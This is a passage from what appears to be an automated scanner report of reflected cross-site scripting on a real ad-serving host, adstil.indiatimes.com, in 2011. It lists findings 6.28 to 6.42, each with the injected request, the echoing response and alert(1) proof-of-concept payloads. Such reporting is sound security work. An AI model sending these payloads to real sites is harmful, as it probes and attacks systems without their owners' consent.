GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaid7a99"><script>alert(1)</script>0584b849768/index.html/1352497994@Right3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:45 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaid7a99"><script>alert(1)</script>0584b849768/index.html/851169165/Right3/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.28. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7f9f"><script>alert(1)</script>24d533f45bb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmle7f9f"><script>alert(1)</script>24d533f45bb/1352497994@Right3? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:25 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmle7f9f"><script>alert(1)</script>24d533f45bb/1866955197/Right3/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.29. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643bc"><script>alert(1)</script>5d97d9ac047 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/643bc"><script>alert(1)</script>5d97d9ac047? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:10 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/643bc"><script>alert(1)</script>5d97d9ac047/1823408980/UNKNOWN/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.30. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f7f5"><script>alert(1)</script>c864f245bd5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?2f7f5"><script>alert(1)</script>c864f245bd5=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:11:02 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1528
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right3#www.timesofindia.com/TOI2009_City_Mum
...[SNIP]...
atimes.com/RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/12053254450/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363266323830?2f7f5"><script>alert(1)</script>c864f245bd5=1">
...[SNIP]...

6.31. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe66f"-alert(1)-"fdfc71bda4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1352497994@Right3?fe66f"-alert(1)-"fdfc71bda4b=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:11:05 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1497
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right3#www.timesofindia.com/TOI2009_City_Mum
...[SNIP]...
ealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1"+RMRAND()+"/"+CounterPos+"/OasDefault/3670000929000010THEADVER6209TOIR/"+CounterID+"/33323137376236613465363266323830?fe66f"-alert(1)-"fdfc71bda4b=1";
//-->
...[SNIP]...

6.32. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159cc"><script>alert(1)</script>63443ecd52d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com159cc"><script>alert(1)</script>63443ecd52d/TOI2009_City_Mumbai/index.html/1507534702@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:06:21 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com159cc"><script>alert(1)</script>63443ecd52d/TOI2009_City_Mumbai/index.html/1338030623/Right1/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.33. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2536"><script>alert(1)</script>3ff82bbe964 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaia2536"><script>alert(1)</script>3ff82bbe964/index.html/1507534702@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:06 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaia2536"><script>alert(1)</script>3ff82bbe964/index.html/277548516/Right1/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.34. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc58c"><script>alert(1)</script>7884baacf04 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmlfc58c"><script>alert(1)</script>7884baacf04/1507534702@Right1? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:07:45 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.htmlfc58c"><script>alert(1)</script>7884baacf04/1532419946/Right1/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.35. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5454f"><script>alert(1)</script>7e19e9d2405 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/5454f"><script>alert(1)</script>7e19e9d2405? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:08:31 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/5454f"><script>alert(1)</script>7e19e9d2405/1598055187/UNKNOWN/default/empty.gif/33323137376236613465363265613830" target="_top">
...[SNIP]...

6.36. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d8e8"-alert(1)-"d7ff56f32e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1?8d8e8"-alert(1)-"d7ff56f32e0=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:11:11 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1498
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right1#www.timesofindia.com/TOI2009_City_Mum
...[SNIP]...
ealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1"+RMRAND()+"/"+CounterPos+"/OasDefault/3670000929000010THEADVER6209TOIR/"+CounterID+"/33323137376236613465363266323830?8d8e8"-alert(1)-"d7ff56f32e0=1";
//-->
...[SNIP]...

6.37. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a0bc"><script>alert(1)</script>41f3675278 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1507534702@Right1?3a0bc"><script>alert(1)</script>41f3675278=1 HTTP/1.1
Host: adstil.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:11:09 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 1526
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Connection: close
Content-Type: text/html

<!--
Support: http://adstil.indiatimes.com#OasDefault/3670000929000010THEADVER6209TOIR#Advertisement12Aug#Advertisement12Aug.html#0a87c#1313160034#422#Hc#Right1#www.timesofindia.com/TOI2009_City_Mum
...[SNIP]...
atimes.com/RealMedia/ads/adstream_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/11696994541/x32/OasDefault/3670000929000010THEADVER6209TOIR/Advert1x1Aug15/33323137376236613465363266323830?3a0bc"><script>alert(1)</script>41f3675278=1">
...[SNIP]...

6.38. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97947"><script>alert(1)</script>ce3dcfd89f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com97947"><script>alert(1)</script>ce3dcfd89f2/TOI2009_City_Mumbai/index.html/1519539382@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:42:55 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 374
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com97947"><script>alert(1)</script>ce3dcfd89f2/TOI2009_City_Mumbai/index.html/641038821/Right2/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.39. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afba1"><script>alert(1)</script>9f896aa4989 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbaiafba1"><script>alert(1)</script>9f896aa4989/index.html/1519539382@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:43:41 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbaiafba1"><script>alert(1)</script>9f896aa4989/index.html/1123754207/Right2/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.40. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94167"><script>alert(1)</script>bd03bb75874 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html94167"><script>alert(1)</script>bd03bb75874/1519539382@Right2? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:44:20 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 375
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html94167"><script>alert(1)</script>bd03bb75874/2049555271/Right2/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.41. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f499b"><script>alert(1)</script>879bf20c60b was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/f499b"><script>alert(1)</script>879bf20c60b? HTTP/1.1
Host: adstil.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO106Bs

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:45:05 GMT
Server: Apache/1.3.42 (Unix) mod_oas/5.8 with cap module/2.0
Content-Length: 377
Expires: Tue, 25 Apr 1995 09:30:27 -0700
Pragma: no-cache
Content-Type: text/html

<A HREF="http://adstil.indiatimes.com/RealMedia/ads/click_lx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/f499b"><script>alert(1)</script>879bf20c60b/2047229998/UNKNOWN/default/empty.gif/33323137376236613465363265353630" target="_top">
...[SNIP]...

6.42. http://adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adstil.indiatimes.com
Path:   /RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1519539382@Right2

Issue detail

